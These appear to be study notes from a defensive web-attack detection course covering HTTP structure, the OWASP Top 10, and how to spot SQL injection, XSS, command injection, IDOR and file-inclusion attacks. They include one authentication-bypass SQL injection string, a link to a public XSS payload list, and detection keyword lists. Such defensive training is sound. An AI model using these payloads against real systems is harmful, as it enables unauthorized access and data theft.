# Introduction 75% of cyber attacks are against web-based applications ## What are web attacks? Web applications provide services to users via a browser interface. Web apps can be exploited to gain access to devices, steal personal data, or cause service disruptions. Attack Methods - SQL Injection - Cross Site Scripting - Command Injection - IDOR - RFI & LFI - File Upload (Web Shell) # Why Detecting Web Attacks is Important Most people use a variety of web applications regularly, such as Spotify, YouTube, and Twitter. Examining the anatomy of an attack, the best scenario is to prevent the attack in the first place. https://www.acunetix.com/websitesecurity/web-application-attack/ # OWASP Open Web Application Security Project Non-profit dedicated to improving software security. ## Top 10 A list of the most critical web application vulnerabilities, curated by OWASP and updated every few years. https://owasp.org/www-project-top-ten/assets/images/mapping.png 2025 Version should be out before July. https://owasp.org/Top10/2025/ 1. Broken Access Control 2. Security Misconfiguration 3. Software Supply Chain Failures 4. Cryptographic Failures 5. Injection 6. Insecure Design 7. Authentication Failures 8. Software or Data Integrity Failures 9. Security Logging and Alerting Failures 10. Mishandling of Exceptional Conditions # How Web Applications Work HTTP protocol is layer 7, so ethernet, IP, TCP, and SSL are used before HTTP protocol HTTP request is handled by the server, also an HTTP response. Resource is displayed in appropriate format. ## HTTP Requests used to retrieve specific resource from a web server, such as HTML, JSON, video. Server's job is to process request and respond/present to the user. If request is sent in a format outside of standard HTTP, will either return error or not provide service. - Request Line - HTTP method and resource requested - Request Headers - Request message body - data to be sent to the server 1. The GET method indicates that the resource "/" is being requested from the server. Because there is no name, a symbol like "/" means that the main page of the web server is being requested. 2. Nowadays there are web applications that belong to more than one domain found on a single web server, so browsers use the "Host" header to identify which domain the requested resource belongs to. 3. When a web application wants to store information on the client's device, it stores it in a "cookie" header. Cookies are typically used to store session information. This saves you from having to re-enter your username and password when you visit a web application that requires you to log in. 4. The “Upgrade-Insecure-Requests” header indicates that the client wants to communicate using encryption (SSL). 5. The “User-Agent” header contains information about the client's browser and operating system. Web servers use this information to send specific HTTP responses to the client. You can find some automated vulnerability scanners by looking under this header. 6. The type of data requested is in the “Accept” header. 7. The type of encoding accepted by the client is found in the “Accept-Encoding” header. You can usually find the names of compression algorithms under this header. 8. The “Accept-Language” header contains the client's language information. The web server uses this information to display the prepared content in the client's language. 9. The “Connection” header shows how the HTTP connection is made. If there is data such as "close", it means that the TCP connection will be closed after receiving the HTTP response. If you see "keep-alive", this means that the connection will be maintained. 10. An empty line is inserted between the HTTP request header and the HTTP request message body to create a partition. 11. Any other data to be sent to the web application is in the Request Message Body. If the HTTP POST method is used, then the POST parameters can be found here. ## HTTP Responses Server performs necessary checks and processes and sends requested resource to the client. Contains: - status line - 100-199: Informational responses - 200-299: Successful responses - 300-399: Redirection messages - 400-499: Client error responses - 500-599: Server error responses - response headers - date - connection - server - last modified - content type - content length - response body - information from requested source # Detecting SQL Injection Attacks Injections are attack vectors where web application directly includes unsanitized data in SQL queries. ## Types of SQL Injections 1. In-Band SQLi (Classic) 1. sent and responded to on the same channel 2. Inferential SQLi (Blind) 1. Queries that receive response which cannot be seen 3. Out-of-Band SQLi 1. if response is communicated through a different channel, such as DNS ## How Does It Work SELECT * FROM users WHERE username = ‘’ OR 1=1 -- - AND password = '**supersecretpassword**' ## What Attackers Gain - Authentication Bypass - Command Execution - Exfiltration of Sensitive Data - Creating/Deleting/Updating database entries ## How to Prevent SQLi - Use a framework - Keep the framework up to date - Always sanitize data received from a user - ALL data, not just form data - Avoid use of raw SQL queries ## Detecting SQLi attacks - In a web request, check all areas that come from the user - Look for SQL keywords - INSERT,SELECT,WHERE - Check for special Characters - ',-,( - Familiarise self with commonly used SQLi payloads ## Detecting Automated SQLi Tools - Look at user agent - check frequency of requests - look at payload content - complicated payload ### Log Breakdown https://ld-images-2.s3.us-east-2.amazonaws.com/Detecting+Web+Attacks/images/URL-Encoding.png "Online URL Decoder" to find web applications that automatically decode URLs for you - be careful uploading critical information like access logs, best to create/use a local parser # Detecting Cross Site Scripting (XSS) Attacks Injection-based web security vulnerability that can be incorporated into legit web applications Still seen because frameworks are occasionally not used, or framework itself has XSS vulnerability and user data has not been sanitized ## Types of XSS 1. Reflected XSS (reflected) 1. payload must be present in the request. most common, not persistent 2. Stored XSS (persistent) 1. attacker permanently uploads xss payload to web application. most dangerous, persistent 3. DOM Based XSS 1. payload is executed as result of modifying DOM environment in victim's browser by original client-side script, so that it runs in unexpected manner ## How Does XSS Work? when whatever is put in an unsanitized parameter is included in an HTTP response, that response can be modified ## How Attackers Take Advantage - Steal user's session information - Capture Credentials ## How to Prevent an XSS Vulnerability - Sanitize data coming from user - use a framework - use the framework correctly - keep your framework up-to-date ## Detecting XSS Attacks - Look for keywords - alert, script - Learn commonly used XSS Payloads - https://github.com/payloadbox/xss-payload-list - Check for use of Special Characters - < or > coming from users are typically markers # Command Injection Attacks ## What are Command Injection Attacks When data received from a user is not sanitized and is passed directly to the operating system shell Attackers exploit command injection vulnerabilities to execute commands directly on the victim operating system ## How to Prevent Command Injection - always sanitize user data - limit user privileges - use virtualization technologies like docker containers ## Detecting Command Injection Attacks - Look in all areas of the web request - look for terminal related language for keywords - dir,ls,cp,cat,type - learn commonly used command injection payloads # Detecting Insecure Direct Object Reference (IDOR) Attacks Insecure Direct Object Reference is caused by absence or improper use of authorization mechanism. Allows user to access object that belongs to another user. ## How IDOR Works Not a vulnerability caused by poor sanitation like other webapp vulns. By manipulating parameters sent to a webapp, gain access to object that belongs to another, and then are able to read, modify, or delete the contents. If application does not check that value being requested belongs to person making the request, this is an IDOR vuln. ## How Attackers Take Advantage of IDOR - Steal Personal Information - Access Unauthorized Documents - Take Unauthorized Actions - delete, modify ## How to Prevent IDOR Make sure person making a request is authorized to make that request. Minimize Parameters requested from the user ## How to Detect IDOR Attacks - Check all parameters - Look at number of requests made to the same page - when IDOR vuln is found, typically followed by brute-force attack - find the pattern - attackers plan a brute-force to reach all accessible objects # Detecting RFI and LFI Attacks LFI is Local File Inclusion, which occers when a file is included without sanitizing data obtained from a user. Said file is located on the same web server that the webapp is hosted on RFI is Remote File Inclusion, and is the same as LFI, but with the key difference that the included file is hosted on another server ## Attackers use RFI and LFI - Execute Code - Disclosure of Sensitive Information - Denial of Service ## How to Prevent LFI and RFI - make sure all data received by user is sanitized - client-based controls are easily bypassed - make sure controls are on both client and server side ## Detecting LFI and RFI Attacks - when examining a user web request, examine all fields - look for special characters - / . , \ - Become familiar with files used in LFI attacks - look for acronyms like HTTP and HTTPS - attackers usually set up web servers to host their files, which are then served via http/https